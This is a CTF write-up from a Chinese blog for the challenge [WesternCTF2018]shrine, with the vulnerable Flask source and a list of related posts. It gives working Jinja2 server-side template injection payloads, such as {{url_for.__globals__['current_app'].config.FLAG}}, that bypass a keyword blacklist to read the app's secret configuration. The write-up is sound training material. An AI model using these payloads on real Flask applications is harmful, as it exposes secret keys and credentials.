[WesternCTF2018]shrine

最新推荐文章于 2022-02-26 19:16:26 发布
最新推荐文章于 2022-02-26 19:16:26 发布
阅读量216 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: CTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/115842257
版权

考查点:SSTI模板注入,config配置文件,python的内置函数绕过黑名单

 

解题思路:

打开容器,如下代码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) 
        + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

测试一下模板注入

/shrine/{{7*7}}

回显为49,验证了SSTI

 

分析一下代码:意思是注册了一个名字为‘FLAG’的config,同时这个题目把(),config,self都过滤掉了,并且黑名单设置的时候,替换为空。

那么可以使用python的内置函数url_for和get_flashed_messages

url_for

url_for.__globals__

回显

 

current_app就是当前下的app,接下来查看当前app下的config

/shrine/{{url_for.__globals__['current_app'].config}}

 回显

其实也可以继续查看'FLAG'

/shrine/{{url_for.__globals__['current_app'].config.FLAG}}

回显

 

get_flashed_messages

用法和url_for一样

/shrine/{{get_flashed_messages.__globals__['current_app'].config.FLAG}}

参考文章:

[WesternCTF2018]shrine

Sk1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2462
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
web buuctf [WesternCTF2018]shrine
weixin_44214568的博客
04-04 1240
考点:模板注入(flask) 1.打开整理代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //显示代码 @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(
WesternCTF2018_shrine
抒情诗
05-08 458
这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923 0x00 开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码: import flask import os app = flask.Fla...
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
shrine-commerce
04-04
"shrine-commerce" 是一个基于 Flutter 和 Dart 技术构建的电子商务项目,旨在提供一个用于学习和实践 MDC-100 系列代码实验室的平台。在这个项目中,你可以深入理解如何用 Flutter 构建现代化的购物应用,同时熟悉 ...
Shrine View-crx插件
04-07
"Shrine View-crx插件"是一款专为谷歌浏览器(Chrome)设计的扩展程序,它为用户带来了一种独特的新标签页体验。当用户打开一个新的浏览器标签时,不再是普通的空白页面,而会显示一个随机选取的日本Shinto神社的...
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
Shrine.cr是一个专门为Crystal编程语言设计的文件附件处理库,灵感来源于Ruby社区中的 Shrine 框架。这个库提供了一套全面的解决方案,用于在Crystal应用程序中上传、存储和管理文件,同时也支持多种ORM适配器,使得...
基于Material Design 2实现的Shrine-MaterialDesign2..zip
09-24
【标题】基于Material Design 2实现的Shrine-MaterialDesign2项目详解 【描述】Material Design 2,也称为Material Design Lite,是Google推出的一种设计语言的升级版,旨在为应用和网站提供更加统一、现代且富有...
[Western CTF 2018]shrine
weixin_45751765的博客
02-16 1432
0x00 前言 ssti复习 贴一下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def s
NO.2-20 [WesternCTF2018]shrine
nigo134的博客
08-01 313
SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 1.模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。一些模板引擎:Smarty,Mako,Jinja2,Jade,Velocity,Freemaker和Twig 模板引擎可
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1507
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 264
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
第五十三题——[WesternCTF2018]shrine
分享简单的安全技术
04-29 265
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>')
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值